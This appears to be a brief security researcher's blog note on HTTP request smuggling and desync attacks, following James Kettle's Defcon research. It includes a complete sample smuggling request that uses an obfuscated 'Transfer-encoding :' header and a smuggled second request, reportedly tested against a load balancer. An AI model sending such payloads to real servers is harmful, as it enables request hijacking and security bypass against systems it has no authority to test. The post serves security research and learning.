HTTP Smuggling & Desync Attacks

At Defcon James Kettle presented on HTTP Smuggling Reborn which revitalized the Smuggling attack and created a new plethora of issues around the HTTP protocol. So as one does decided to dig into it a bit and discover all the vectors. Quickly discovered that the issue was due to a clever space at the end of Transfer-encoding : (there are other variants that were discovered later). Here is an example payload that was tested against an load balancer which caused desyncs and smugglings. I’ll be posting more about this but just wanted to get my notes that I took from the initial research up. I plan to do the labs that PortSwigger provides since the content is so great and free (you should do it too).

Sample request


POST /razzamatazz HTTP/1.1  
Host: www.asdfghj.com  
Connection: close  
Content-Length: 4  
Origin: https://www.asdfghj.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36  
Content-Type: application/x-www-form-urlencoded  
Accept: */*  
Referer: https://www.asdfghj.com/ba/mb/oozling  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9,ru;q=0.8  
X-Forwarded-For: 1.1.1.26  
Transfer-encoding : chunked

96  
XGET /ba/mb/oozling HTTP/1.1  
X-Foo: b


Did some additional testing between load balancers mixed with particular languages (Python flask, PHP, Nodejs express and Golang http client) were vulnerable to the smuggling technique due to not respecting the transfer encoding + content length combination.